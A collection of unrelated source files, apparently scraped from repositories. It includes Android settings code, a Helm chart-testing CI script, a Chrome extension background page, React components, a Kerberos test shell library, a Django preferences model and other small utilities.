        AlertDialog.Builder dialog = new AlertDialog.Builder(this);
        dialog.setTitle(getResources().getString(R.string.choose_language));
        dialog.setSingleChoiceItems(langitems, languageid, (dialog1, i) -> {
            // Index order must match langitems: en, ta, hi, te.
            if (i == 0) {
                setLocale("en", 0);
                recreate();
            } else if (i == 1) {
                setLocale("ta", 1);
                recreate();
            } else if (i == 2) {
                setLocale("hi", 2);
                recreate();
            } else if (i == 3) {
                setLocale("te", 3);
                recreate();
            }
            dialog1.dismiss();
        });
        AlertDialog alertDialog = dialog.create();
        alertDialog.show();
    }

    // Applies the locale to the current resources and persists the choice.
    private void setLocale(String lang, int langid) {
        Locale locale = new Locale(lang);
        Locale.setDefault(locale);
        Configuration config = new Configuration();
        config.locale = locale; // deprecated API, retained for current minSdk behavior
        getBaseContext().getResources().updateConfiguration(config, getBaseContext().getResources().getDisplayMetrics());
        SharedPreferences.Editor editor = getSharedPreferences("lang_settings", MODE_PRIVATE).edit();
        editor.putString("lang", lang);
        editor.putInt("langid", langid);
        editor.apply();
    }

    // Restores the persisted language and theme into UI + night mode.
    private void loadData() {
        SharedPreferences preferences = getSharedPreferences("lang_settings", Activity.MODE_PRIVATE);
        String language = preferences.getString("lang", "");
        int langid = preferences.getInt("langid", 0);
        // NOTE(review): on first run `language` is "" and an empty Locale is
        // applied — confirm this is harmless on all supported API levels.
        setLocale(language, langid);
        SharedPreferences sharedPreferences = getSharedPreferences("theme", 0);
        String Theme = sharedPreferences.getString(THEME, "");
        if (Theme.equals("2")) {
            materialButtonToggleGroup.check(R.id.btnLight);
            sun.setVisibility(View.VISIBLE);
            AppCompatDelegate.setDefaultNightMode(AppCompatDelegate.MODE_NIGHT_NO);
            moon.setVisibility(View.GONE);
            default_settings.setVisibility(View.GONE);
        }
        if (Theme.equals("1")) {
            materialButtonToggleGroup.check(R.id.btnDark);
            AppCompatDelegate.setDefaultNightMode(AppCompatDelegate.MODE_NIGHT_YES);
            moon.setVisibility(View.VISIBLE);
            default_settings.setVisibility(View.GONE);
            sun.setVisibility(View.GONE);
        }
        if (Theme.equals("0")) {
            materialButtonToggleGroup.check(R.id.btnDefault);
            AppCompatDelegate.setDefaultNightMode(AppCompatDelegate.MODE_NIGHT_FOLLOW_SYSTEM);
            default_settings.setVisibility(View.VISIBLE);
            moon.setVisibility(View.GONE);
            sun.setVisibility(View.GONE);
        }
    }

    // Back always returns to the profile editor rather than finishing.
    @Override
    public void onBackPressed() {
        startActivity(new Intent(CustomiseActivity.this, edit_profile.class).addFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
    }
}
|
#!/bin/bash
# CI entry point: detects charts changed since the last git tag and, if any,
# lints/installs them with chart-testing (ct) inside a kind cluster.
set -o errexit
set -o nounset
set -o pipefail

readonly CT_VERSION=latest
readonly KIND_VERSION=v0.11.1
readonly CLUSTER_NAME=chart-testing
readonly REPO_ROOT="${REPO_ROOT:-$(git rev-parse --show-toplevel)}"

# Latest tag, or the repository's root commit when no tag exists yet.
find_latest_tag() {
    if ! git describe --tags --abbrev=0 2>/dev/null; then
        git rev-list --max-parents=0 --first-parent HEAD
    fi
}

# Long-lived ct container (kept alive with `cat`) that later steps exec into.
create_ct_container() {
    echo "Starting Chart Testing container"
    docker run --rm --interactive --detach --network host --name ct \
        --volume "$(pwd)/.circleci/ct.yaml:/etc/ct/ct.yaml" \
        --volume "$(pwd):/workdir" \
        --workdir /workdir \
        "quay.io/helmpack/chart-testing:${CT_VERSION}" \
        cat
}

cleanup() {
    echo "Removing ct container"
    docker kill ct >/dev/null 2>&1 || true
}

docker_exec() {
    docker exec --interactive --tty ct "$@"
}

# Installs kind, creates the cluster, and copies its kubeconfig into the ct container.
create_kind_cluster() {
    echo "Installing kind"
    curl -sSLo kind "https://github.com/kubernetes-sigs/kind/releases/download/${KIND_VERSION}/kind-linux-amd64"
    chmod +x kind
    sudo mv kind /usr/local/bin/kind
    echo "Creating cluster"
    kind create cluster --name "${CLUSTER_NAME}" --wait 5m -q
    echo "Copying kubeconfig to container"
    local kubeconfig
    kubeconfig="$(pwd)/kube-config"
    kind get kubeconfig --name "${CLUSTER_NAME}" | tee "${kubeconfig}"
    docker_exec mkdir -p /root/.kube
    docker cp "${kubeconfig}" ct:/root/.kube/config
    docker_exec kubectl cluster-info
    docker_exec kubectl get nodes
}

# Replace kind's default storageclass with rancher local-path provisioner.
install_local_path_provisioner() {
    docker_exec kubectl delete storageclass standard
    docker_exec kubectl apply -f "https://raw.githubusercontent.com/rancher/local-path-provisioner/master/deploy/local-path-storage.yaml"
}

install_charts() {
    docker_exec ct install --all
    echo
}

main() {
    pushd "${REPO_ROOT}" >/dev/null
    echo "Fetching tags"
    git fetch --tags
    local latest_tag
    latest_tag=$(find_latest_tag)
    local latest_tag_rev
    latest_tag_rev=$(git rev-parse --verify "${latest_tag}")
    echo "${latest_tag_rev} ${latest_tag} (latest tag)"
    local head_rev
    head_rev=$(git rev-parse --verify HEAD)
    echo "${head_rev} HEAD"
    if [[ "${latest_tag_rev}" == "${head_rev}" ]]; then
        echo "No code changes. Nothing to release."
        exit
    fi
    echo "Identifying changed charts since tag ${latest_tag}"
    local changed_charts=()
    # NOTE(review): only .yaml changes are considered; chart changes confined
    # to templates/*.tpl or values files with other extensions would be missed
    # — confirm this filter is intended.
    readarray -t changed_charts <<< "$(git diff --find-renames --name-only "${latest_tag_rev}" | grep '\.yaml$' | cut -d '/' -f 1 | sort -u)"
    if [[ -n "${changed_charts[*]}" ]]; then
        local changes_pending=no
        # Only top-level directories that actually contain a Chart.yaml count.
        for chart in "${changed_charts[@]}"; do
            if [[ -f "${chart}/Chart.yaml" ]]; then
                changes_pending=yes
                break
            fi
        done
        if [[ "${changes_pending}" == "yes" ]]; then
            create_ct_container
            trap cleanup EXIT
            create_kind_cluster
            install_local_path_provisioner
            install_charts
        else
            echo "Nothing to do. No chart changes detected."
        fi
    else
        echo "Nothing to do. No chart changes detected."
    fi
    popd >/dev/null
}

main
|
<filename>src/components/UploadAttachmentButton/index.js<gh_stars>10-100
import UploadAttachmentButton from './UploadAttachmentButton'
import connector from './UploadAttachmentButton.connector'

// Barrel file: export the store-connected variant as the component's default.
export default connector(UploadAttachmentButton)
|
/**
 * Created by AstafyevaLA on 24.04.2014.
 *
 * Chrome extension background page: owns the shared singletons and keeps the
 * browser-action icon/popup in sync with the Google auth state.
 */
// loads taskLists, calendarLists, userName
var loader = new Loader();
// keeps the number of successfully added tasks and events to ask for mark
var markCounter = new MarkCounterBool(30, 365);
// dictionaries module
var spr = new Spr();
// popup window settings that should be saved between popup window launches
var popupSettings = new PopupSettings();
// google analytics (for logging)
var _gaq;
// whether the last auth check found a usable token (see updateViewNoLoad)
var connectionOk = false;
/* Updates the browser-action icon and popup to match the auth state, then
   either reloads data (token present) or clears the cached data.
   Fixes: removed the stray `;` after the function declaration and the
   duplicated setPopup call — the popup page is identical in both branches. */
function updateView() {
    var isTokenOk = loader.TokenNotNull();
    chrome.browserAction.setPopup({popup : "views/Popup.html"});
    if (isTokenOk) {
        chrome.browserAction.setIcon({ 'path' : '../images/daybyday16.png'});
        loader.Load(false);
    }
    else {
        chrome.browserAction.setIcon({ 'path' : '../images/daybyday16gray.png'});
        loader.Clear();
    }
}
/* Same as updateView() but without triggering a data load; also records the
   connection state in the global `connectionOk`.
   Fix: the setPopup call was duplicated in both branches — hoisted out. */
function updateViewNoLoad()
{
    var isTokenOk = loader.TokenNotNull();
    chrome.browserAction.setPopup({popup : "views/Popup.html"});
    if (isTokenOk) {
        chrome.browserAction.setIcon({ 'path' : '../images/daybyday16.png'});
    }
    else {
        chrome.browserAction.setIcon({ 'path' : '../images/daybyday16gray.png'});
    }
    connectionOk = isTokenOk;
}
/* Ask for taskLists, calendarLists, userName with select Google account.
   Triggered from the browser-action click while unauthenticated; Load(true)
   forces the interactive account-selection flow. */
function AuthAndAskForTaskLists() {
    loader.Load(true);
    updateViewNoLoad();
}
/* Writes a message to the console prefixed with the current date and time. */
function LogMsg(message) {
    var stamp = GetDateTimeStr();
    console.log(stamp + ' ' + message);
}
/* On Got Message event handler.
   When connection appears/disappears we should update view.
   Fixes: guard against a null/undefined request and use strict equality
   instead of the loose truthiness-plus-`==` combination. */
function OnGotMessage(request, sender, sendResponse) {
    if (request && request.greeting === "token") {
        updateView();
    }
}
/* Background page initialization: sets up Google Analytics, renders the
   initial (signed-out) icon, wires the browser-action click and runtime
   message handlers, and kicks off authorization. */
function init () {
    _gaq = _gaq || [];
    _gaq.push(['_setAccount', c_analytics_code]);
    // Standard async GA bootstrap snippet (script src is intentionally
    // commented out — NOTE(review): confirm whether GA loading is disabled
    // on purpose).
    (function() {
        var ga = document.createElement('script');
        ga.type = 'text/javascript';
        ga.async = true;
        /*ga.src = 'https://ssl.google-analytics.com/ga.js';*/
        var s = document.getElementsByTagName('script')[0];
        s.parentNode.insertBefore(ga, s);
    })();
    updateView();
    // Start gray (signed-out) until authorization succeeds.
    chrome.browserAction.setIcon({ 'path' : '../images/daybyday16gray.png'});
    chrome.browserAction.onClicked.addListener(AuthAndAskForTaskLists);
    chrome.runtime.onMessage.addListener(OnGotMessage);
    loader.requestProcessor.onChangeConnectionState = updateView;
    loader.requestProcessor.Authorize();
}
// Run init once the background page has loaded.
window.addEventListener('load', init, false);
// all uncaught errors are sent to Google Analytics
window.onerror = function(message, file, line) {
    try {
        _gaq.push(['_trackEvent', "Global", "Exception", file + "(" + line + "): " + message])
    }
    catch (e) {
        // Analytics itself failed; fall back to the console.
        LogMsg('gaq push exception error' + e)
    }
}
// Reports a single event to Google Analytics.
// name - event name; params - event params.
// Failures are logged rather than propagated so tracking can never break callers.
function trackEvent(name, params) {
    var payload = ['_trackEvent', name, params];
    try {
        _gaq.push(payload);
    } catch (err) {
        LogMsg('gaq push event error ' + err);
    }
}
|
import React from 'react';
import Header from './Header';
import UserInfo from './UserInfo';
import Content from './Content';
import './css/Main.css';
class Main extends React.Component{
render(){
return(
<div className="main bg-dark">
<div className="main-header">
<Header/>
</div>
<div className="main-content">
<UserInfo/>
<Content/>
</div>
</div>
)
}
}
export default Main;
|
#!/bin/bash
# profiles = xccdf_org.ssgproject.content_profile_cui
# remediation = bash

# Shared helpers that stage a scratch auditd configuration for the scenario.
# ("enviroment" (sic) matches the helper's actual spelling upstream.)
. $SHARED/auditd_utils.sh
prepare_auditd_test_enviroment
# Seed the config with a non-compliant value the remediation must correct.
set_parameters_value /etc/audit/auditd.conf "space_left_action" "halt"
|
#
# Original solution via StackOverflow:
# http://stackoverflow.com/questions/35802939/install-only-available-packages-using-conda-install-yes-file-requirements-t
#
#
# Install via `conda` directly.
# This will fail to install all
# dependencies. If one fails,
# all dependencies will fail to install.
#-------------------------------------------------------------------------------------------------------------
conda create -n py38 python=3.8
source activate py38
# ------------------------------------------------------------------------------------------------------------
conda install --yes --file requirements.txt
#
# To work around the all-or-nothing issue above,
# iterate over the lines of requirements.txt and
# install each package individually.
#
while read requirement; do conda install --yes $requirement; done < requirements.txt
# Image registration (not available on conda)
pip install git+https://github.com/BioSpecNorway/IRmHiRegistration.git
# mRMR feature selection, used for best practices in (Raman) spectroscopic DL
pip install git+https://github.com/smazzanti/mrmr
/*eslint-disable*/
import React from "react";
// nodejs library to set properties for components
import PropTypes from "prop-types";
// nodejs library that concatenates classes
import classNames from "classnames";
// material-ui core components
import { List, ListItem } from "@material-ui/core";
import { makeStyles } from "@material-ui/core/styles";
import { Link } from "react-router-dom";
// @material-ui/icons
import Favorite from "@material-ui/icons/Favorite";
import styles from "assets/jss/material-kit-react/components/footerStyle.js";
const useStyles = makeStyles(styles);
export default function Footer(props) {
const classes = useStyles();
const { whiteFont } = props;
const footerClasses = classNames({
[classes.footer]: true,
[classes.footerWhiteFont]: whiteFont
});
const aClasses = classNames({
[classes.a]: true,
[classes.footerWhiteFont]: whiteFont
});
return (
<footer className={footerClasses}>
<div className={classes.container}>
<div className={classes.left}>
<List className={classes.list}>
<ListItem className={classes.inlineBlock}>
<a href="/pool?id=CPU" className={classes.block}>
[CPU]
</a>
</ListItem>
<ListItem className={classes.inlineBlock}>
<a href="/pool?id=VENUS" className={classes.block}>
[VENUS]
</a>
</ListItem>
<ListItem className={classes.inlineBlock}>
<a href="/pool?id=ERA" className={classes.block}>
[ERA]
</a>
</ListItem>
<ListItem className={classes.inlineBlock}>
<a href="/pool?id=PROTO" className={classes.block}>
[PROTO]
</a>
</ListItem>
<ListItem className={classes.inlineBlock}>
<a href="/pool?id=MINES" className={classes.block}>
[MINES]
</a>
</ListItem>
<ListItem className={classes.inlineBlock}>
<a href="/pool?id=CURIE" className={classes.block}>
[CURIE]
</a>
</ListItem>
<ListItem className={classes.inlineBlock}>
<Link to="/privacy-policy" className={classes.block}>
Privacy Policy
</Link>
</ListItem>
<ListItem className={classes.inlineBlock}>
<Link to="/cookie-policy" className={classes.block}>
Cookie Policy
</Link>
</ListItem>
</List>
</div>
<div className={classes.right}>
© {1900 + new Date().getYear()} made by{" "}
<a
href="#"
className={aClasses}
target="_blank"
>
Cardano Pools United
</a>
</div>
<div className={classes.left}>
The information on this site may contain errors or mistakes, please do your own research. Unofficial Cardano website.
Past performance is not indicative of future results. Any investment in blockchain assets involves the risk of loss of part or all of your investment. The value of the blockchain assets you exchange is subject to market and other investment risks.
</div>
</div>
</footer>
);
}
Footer.propTypes = {
whiteFont: PropTypes.bool
};
|
# Shell function library to initialize Kerberos credentials
#
# Note that while many of the functions in this library could benefit from
# using "local" to avoid possibly hammering global variables, Solaris /bin/sh
# doesn't support local and this library aspires to be portable to Solaris
# Bourne shell. Instead, all private variables are prefixed with "tap_".
#
# The canonical version of this file is maintained in the rra-c-util package,
# which can be found at <http://www.eyrie.org/~eagle/software/rra-c-util/>.
#
# Written by Russ Allbery <eagle@eyrie.org>
# Copyright 2009, 2010, 2011, 2012
# The Board of Trustees of the Leland Stanford Junior University
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
# We use test_tmpdir.
. "${SOURCE}/tap/libtap.sh"
# Set up Kerberos, including the ticket cache environment variable.  Bail out
# if not successful, return 0 if successful, and return 1 if Kerberos is not
# configured.  Sets the global principal variable to the principal to use.
kerberos_setup () {
    tap_keytab=`test_file_path config/keytab`
    principal=`test_file_path config/principal`
    principal=`cat "$principal" 2>/dev/null`
    if [ -z "$tap_keytab" ] || [ -z "$principal" ] ; then
        return 1
    fi
    KRB5CCNAME=`test_tmpdir`/krb5cc_test; export KRB5CCNAME
    # Try the various kinit invocation styles in turn: Heimdal with AFS
    # support (--no-afslog), MIT (-k -t), old MIT (-t), then Solaris (-k -K).
    kinit --no-afslog -k -t "$tap_keytab" "$principal" >/dev/null </dev/null
    status=$?
    if [ $status != 0 ] ; then
        kinit -k -t "$tap_keytab" "$principal" >/dev/null </dev/null
        status=$?
    fi
    if [ $status != 0 ] ; then
        kinit -t "$tap_keytab" "$principal" >/dev/null </dev/null
        status=$?
    fi
    if [ $status != 0 ] ; then
        kinit -k -K "$tap_keytab" "$principal" >/dev/null </dev/null
        status=$?
    fi
    if [ $status != 0 ] ; then
        bail "Can't get Kerberos tickets"
    fi
    return 0
}

# Clean up at the end of a test.  Currently only removes the ticket cache.
kerberos_cleanup () {
    tap_tmp=`test_tmpdir`
    rm -f "$tap_tmp"/krb5cc_test
}

# List the contents of a keytab with enctypes and keys.  This adjusts for the
# difference between MIT Kerberos (which uses klist) and Heimdal (which uses
# ktutil).  Be careful to try klist first, since the ktutil on MIT Kerberos
# may just hang.  Takes the keytab to list and the file into which to save the
# output, and strips off the header containing the file name.
ktutil_list () {
    tap_tmp=`test_tmpdir`
    if klist -keK "$1" > "$tap_tmp"/ktutil-tmp 2>/dev/null ; then
        :
    else
        ktutil -k "$1" list --keys > "$tap_tmp"/ktutil-tmp </dev/null \
            2>/dev/null
    fi
    # Drop the "Keytab name:" banner and any remaining header lines.
    sed -e '/Keytab name:/d' -e "/^[^ ]*:/d" "$tap_tmp"/ktutil-tmp > "$2"
    rm -f "$tap_tmp"/ktutil-tmp
}
|
<!-- Fixes: added the HTML5 doctype (the page previously rendered in quirks
     mode), a lang attribute, and an explicit charset declaration. -->
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>People</title>
</head>
<body>
<table>
<tr>
<th>Name</th>
<th>Age</th>
<th>Address</th>
</tr>
<tr>
<td>Thomas</td>
<td>25</td>
<td>101 Main Street</td>
</tr>
<tr>
<td>Maria</td>
<td>35</td>
<td>145 Second Street</td>
</tr>
<tr>
<td>Joe</td>
<td>45</td>
<td>35 Wall Street</td>
</tr>
</table>
</body>
</html>
import React, { useState } from 'react';
const Tabs = () => {
const [activeTab, setActiveTab] = useState(0);
return (
<div>
<div>
<button
onClick={() => setActiveTab(0)}
style={activeTab === 0 ? { fontWeight: 'bold' } : null}
>
Tab 1
</button>
<button
onClick={() => setActiveTab(1)}
style={activeTab === 1 ? { fontWeight: 'bold' } : null}
>
Tab 2
</button>
</div>
<div>
{activeTab === 0 ? <Tab1 /> : null}
{activeTab === 1 ? <Tab2 /> : null}
</div>
</div>
);
};
const Tab1 = () => <p>This is Tab 1</p>;
const Tab2 = () => <p>This is Tab 2</p>;
export default Tabs; |
#!/bin/bash
# What we get from Transifex is unusable and needs some fixing before we're able to use
# the translations.
#
# Fixes: fail fast when no file argument is given, and quote "$FILE"
# everywhere so paths containing spaces or glob characters work.

if [ $# -lt 1 ] || [ ! -f "$1" ]; then
    echo "usage: $0 <strings.xml>" >&2
    exit 1
fi
FILE=$1

# Fix xliff tags
perl -i -pe 's/<xliff:g id=\\?"(.*?)?\\?">/<xliff:g id="\1">/g' "$FILE"
# NOTE(review): this substitution looks like a no-op (pattern == replacement);
# it may have been an entity-unescaping rule mangled at some point — verify.
perl -i -pe 's/<\/xliff:g>/<\/xliff:g>/g' "$FILE"
# Escape single and double quotes before and after xliff tags
perl -i -pe 's/([^\\])(["'\''])<xliff/\1\\\2<xliff/g' "$FILE"
perl -i -pe 's/xliff:g>(["'\''])/xliff:g>\\\1/g' "$FILE"
# Restore "<" and ">"
perl -i -pe 's/&(lt|gt);/&\1;/g' "$FILE"
# <string ...></string> -> <string ... />
perl -i -pe 's/"><\/string>/"\/>/g' "$FILE"
# Escape single and double quotes (but not in comments or the xml tag)
perl -i -pe 's/([^\\])'\''/\1\\'\''/g unless /(<!--|xml)/' "$FILE"
# Fix escaped HTML in 'apg_learn_more'
# NOTE(review): the next three substitutions also look like no-ops — verify
# against the original upstream script.
perl -i -pe 's/<a href/<a href/g' "$FILE"
perl -i -pe 's/">/">/g' "$FILE"
perl -i -pe 's/<(\/?[a-z])>/<\1>/g' "$FILE"
|
import subprocess
import json
def query_cardano_tip(testnet_magic):
    """Query the local cardano-node for the current chain tip.

    Args:
        testnet_magic: network magic number passed to ``--testnet-magic``.

    Returns:
        Tuple ``(slot_number, block_number, tip_hash)`` from the tip JSON.

    Raises:
        RuntimeError: if ``cardano-cli`` exits non-zero (previously the
            failure was silent and ``json.loads`` crashed on empty output).

    Note: the command is now passed as an argument list (no shell), which
    avoids shell injection and quoting issues.
    """
    command = [
        "cardano-cli", "query", "tip",
        "--testnet-magic", str(testnet_magic),
    ]
    result = subprocess.run(command, capture_output=True, text=True)
    if result.returncode != 0:
        raise RuntimeError(f"cardano-cli failed: {result.stderr.strip()}")
    tip_info = json.loads(result.stdout)
    slot_number = tip_info["slot"]
    block_number = tip_info["block"]
    tip_hash = tip_info["hash"]
    return slot_number, block_number, tip_hash
# Magic number for the public Cardano testnet this script targets.
testnet_magic_number = 1097911063
slot, block, tip_hash = query_cardano_tip(testnet_magic_number)
print(f"Slot Number: {slot}")
print(f"Block Number: {block}")
print(f"Tip Hash: {tip_hash}")
import uuid
from django.db import models
class Preference(models.Model):
    """站点偏好 (site-wide preferences).

    Singleton-style settings row: branding, legal footer text, download
    limits, and registration policy. A value of -1 for the size/number
    limits means "unlimited" — TODO confirm against consumers.
    """
    # Random UUID string primary key instead of an auto-increment id.
    uuid = models.CharField(primary_key=True, max_length=36, default=uuid.uuid4)
    name = models.CharField('网站名称', max_length=45)
    update_time = models.DateTimeField(auto_now=True)
    create_time = models.DateTimeField(auto_now_add=True)
    logo_url = models.CharField('Logo', max_length=255, blank=True, null=True, default='')
    favicon_url = models.CharField('favicon', max_length=255, blank=True, null=True, default='')
    copyright = models.CharField('版权信息', max_length=1024, blank=True, null=True, default='')
    record = models.CharField('备案信息', max_length=1024, blank=True, null=True, default='')
    download_dir_max_size = models.BigIntegerField('zip下载大小限制(B)', default=-1)
    download_dir_max_num = models.BigIntegerField('zip下载数量限制', default=-1)
    default_total_size_limit = models.BigIntegerField('用户默认总大小限制(B)', default=-1)
    allow_register = models.BooleanField('允许自主注册', default=True)

    def __str__(self):
        return self.name

    class Meta:
        db_table = 'preference'
        verbose_name = '站点偏好'
        verbose_name_plural = '站点偏好'
|
import Service from '@ember/service';
import Ember from 'ember';
export default Service.extend({
client:undefined,
urlStateService: Ember.inject.service(),
regionLocatorService: Ember.inject.service(),
init: function(){
this.setupSDK();
},
setupSDK: function(){
let state = this.get('urlStateService').cachedState();
let urlParams = new URLSearchParams(state);
let region = this.get('regionLocatorService').getRegion(urlParams.get('region'));
let client = new window.purecloud.apps.ClientApp({
pcEnvironment: `${region.domain}.${region.extension}`
});
this.set('client', client);
},
navigateToGroup: function(groupId){
this.get('client').directory.showGroup(groupId);
}
});
|
<reponame>petercunning/notebook<filename>CSW/geoportal-servicetype.py
# coding: utf-8

# Notebook export: query the NGDC Geoportal CSW catalog for COAWST datasets
# and WMS endpoints.
#
# Fix: the script mixed Python-2 print statements (`print x`) with Python-3
# print() calls, so it could not run cleanly under either interpreter;
# all prints are now function calls (valid on py2.7 and py3).

# In[ ]:

# Query Geoportal CSW to find COAWST data

# In[1]:

from owslib.csw import CatalogueServiceWeb
from owslib import fes
import numpy as np

# In[2]:

endpoint = 'http://www.ngdc.noaa.gov/geoportal/csw'
csw = CatalogueServiceWeb(endpoint, timeout=60)
print(csw.version)

# In[3]:

csw.get_operation_by_name('GetRecords').constraints

# In[4]:

# Free-text match on "COAWST" anywhere in the record.
val = 'COAWST'
filter1 = fes.PropertyIsLike(propertyname='apiso:AnyText', literal=('*%s*' % val),
                             escapeChar='\\', wildCard='*', singleChar='?')
filter_list = [filter1]

# In[5]:

csw.getrecords2(constraints=filter_list, maxrecords=100, esn='full')
print(len(csw.records.keys()))
for rec in list(csw.records.keys()):
    print('title:' + csw.records[rec].title)
    print('identifier:' + csw.records[rec].identifier)
    print('modified:' + csw.records[rec].modified)

# In[6]:

# Inspect one randomly-chosen record's access references.
choice = np.random.choice(list(csw.records.keys()))
print(csw.records[choice].title)
csw.records[choice].references

# ## Query Geoportal for all WMS endpoints

# In[7]:

val = 'wms'
filter1 = fes.PropertyIsLike(propertyname='apiso:ServiceType', literal=('*%s*' % val),
                             escapeChar='\\', wildCard='*', singleChar='?')
filter_list = [filter1]
csw.getrecords2(constraints=filter_list, maxrecords=1000)
print(len(csw.records.keys()))

# ## Query Geoportal for COAWST and WMS endpoints

# In[8]:

# Nested list => logical AND of the two filters in OWSLib.
val = 'wms'
filter1 = fes.PropertyIsLike(propertyname='apiso:ServiceType', literal=('*%s*' % val),
                             escapeChar='\\', wildCard='*', singleChar='?')
val = 'COAWST'
filter2 = fes.PropertyIsLike(propertyname='apiso:AnyText', literal=('*%s*' % val),
                             escapeChar='\\', wildCard='*', singleChar='?')
filter_list = [[filter1, filter2]]
csw.getrecords2(constraints=filter_list, maxrecords=1000)
print(len(csw.records.keys()))

# In[9]:

for rec in list(csw.records.keys()):
    print('title:' + csw.records[rec].title)
    print('identifier:' + csw.records[rec].identifier)
    print('modified:' + csw.records[rec].modified)

# In[11]:

val = 'Warner'
#val = 'COADS'
filter1 = fes.PropertyIsLike(propertyname='apiso:anyText', literal=('*%s*' % val),
                             escapeChar='\\', wildCard='*', singleChar='?')
filter_list = [filter1]
csw.getrecords2(constraints=filter_list, maxrecords=1000)
print(len(csw.records.keys()))
for rec in list(csw.records.keys()):
    print('title:' + csw.records[rec].title)
    print('identifier:' + csw.records[rec].identifier)
    print('modified:' + csw.records[rec].modified)
    print(' ')

# In[ ]:
|
import sys
import subprocess
def execute_command(command):
    """Run *command* through the shell, exiting the process on failure.

    On success the decoded stdout is returned (previously it was captured
    and silently discarded). On failure the command and its stderr are
    printed and the process exits with status 1.
    """
    process = subprocess.Popen(
        command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE
    )
    stdout, stderr = process.communicate()
    if process.returncode != 0:
        print(f"Error executing command: {command}")
        # errors='replace' so undecodable bytes cannot raise while reporting.
        print(stderr.decode('utf-8', errors='replace'))
        sys.exit(1)
    return stdout.decode('utf-8', errors='replace')
def main():
    """Build, optionally run the test suite, and install via make."""
    execute_command("make")
    python_version = sys.version_info
    # 'make check' is only run under Python 2.7 — presumably the test suite
    # only supports that interpreter; TODO confirm.
    if python_version.major == 2 and python_version.minor == 7:
        execute_command("make check")
    execute_command("make install")


if __name__ == "__main__":
    main()
import React, { useState } from 'react';
import axios from 'axios';
function BookSearch() {
const [query, setQuery] = useState('');
const [books, setBooks] = useState([]);
const searchBooks = async (e) => {
e.preventDefault();
const result = await axios.get(`https://www.googleapis.com/books/v1/volumes?q=${query}`);
setBooks(result.data.items);
}
return (
<form onSubmit={searchBooks}>
<input
type="text"
value={query}
onChange={(e) => setQuery(e.target.value)}
/>
<button type="submit">Search</button>
<ul>
{books.map(book => (
<li key={book.id}>
<img src={book.volumeInfo.imageLinks.thumbnail} alt="book cover" />
<div>
<h2>{book.volumeInfo.title}</h2>
<p>{book.volumeInfo.description}</p>
</div>
</li>
))}
</ul>
</form>
)
}
export default BookSearch; |
import re
def validatePassword(password, confirmPassword):
    """Return True when the two passwords match and meet strength rules.

    Rules: at least 8 characters, and at least one uppercase letter,
    one lowercase letter, one digit, and one of ``!@#$%^&*``.
    """
    if password != confirmPassword:
        return False
    checks = (
        len(password) >= 8,
        re.search(r"[A-Z]", password) is not None,
        re.search(r"[a-z]", password) is not None,
        re.search(r"\d", password) is not None,
        re.search(r"[!@#$%^&*]", password) is not None,
    )
    return all(checks)
# Test cases
print(validatePassword("P@ssw0rd", "P@ssw0rd")) # Output: True
print(validatePassword("weak", "weak")) # Output: False |
#!/usr/bin/env bash
# Batch skull-stripping: runs atlasBREX twice per subject image
# (FNIRT-based and ANTs/SyN-based registration) and renames the outputs.
#fractional intensity should be determined prior running atlasBREX
#nohup siterate.sh &
echo "PID: $BASHPID"
# Process every subject volume named like 'sj_<name>.nii.gz'.
for file in *'sj_'*'.nii.gz'*
do
    # Brain / non-brain template pair used for both registrations.
    btemplate=b_T1_2weeks.nii.gz
    nbtemplate=nb_T1_2weeks.nii.gz
    #remove 'sj' prefix to derive the output name
    name=$(echo $file | cut -d "_" -f2- )
    #atlasBREX: FNIRT
    bash atlasBREX.sh -b $btemplate -nb $nbtemplate -h $file -f 0.8 -reg 1 -w 5,5,5 -msk a,0,0
    wait
    #remove prefix and rename
    mv -f ${file%%.*}_brain.nii.gz FNIRT_${name%%.*}_brain.nii.gz
    mv -f ${file%%.*}_brain_lin.nii.gz FLIRT_${name%%.*}_brain_lin.nii.gz
    #remove warp files and matrix
    rm -f *std2high*
    wait
    #atlasBREX: ANTs/SyN
    bash atlasBREX.sh -b $btemplate -nb $nbtemplate -h $file -f 0.8 -reg 2 -w 1 -msk a,0,0
    wait
    #remove prefix and rename
    mv -f ${file%%.*}_brain.nii.gz SyN_${name%%.*}_brain.nii.gz
    mv -f ${file%%.*}_brain_lin.nii.gz ANTS_${name%%.*}_brain_lin.nii.gz
    #remove warp files and matrix
    rm -f *std2high*
    wait
done
import * as React from "react";
import { addons, types } from "@storybook/addons";
import { AddonPanel } from "@storybook/components";
import { ADDON_ID, PANEL_ID, PARAM_KEY } from "./constants";
import { Panel } from "./panel";
// Register this addon with Storybook and add a panel tab to the addons pane.
addons.register(ADDON_ID, () => {
  addons.add(PANEL_ID, {
    title: "Abstract",
    type: types.PANEL,
    // `active` is true only while this tab is selected; AddonPanel uses it
    // to hide the content when another tab is showing.
    render: ({ active, key }) => (
      <AddonPanel active={active} key={key}>
        <Panel />
      </AddonPanel>
    ),
    // Story parameter key this panel reads its configuration from.
    paramKey: PARAM_KEY
  });
});
-- Table `task`.
-- FIX: the original put the `AUTO_INCREMENT=1` table option inside the
-- column list (a syntax error), and declared the column AUTO_INCREMENT
-- before any key existed (MySQL requires an AUTO_INCREMENT column to be
-- indexed). Dump-style ordering is used instead: create plain, add the
-- primary key, then switch the column to AUTO_INCREMENT.
CREATE TABLE `task` (
  `id` int(11) NOT NULL,
  `title` varchar(255) CHARACTER SET utf8 COLLATE utf8_unicode_ci DEFAULT NULL,
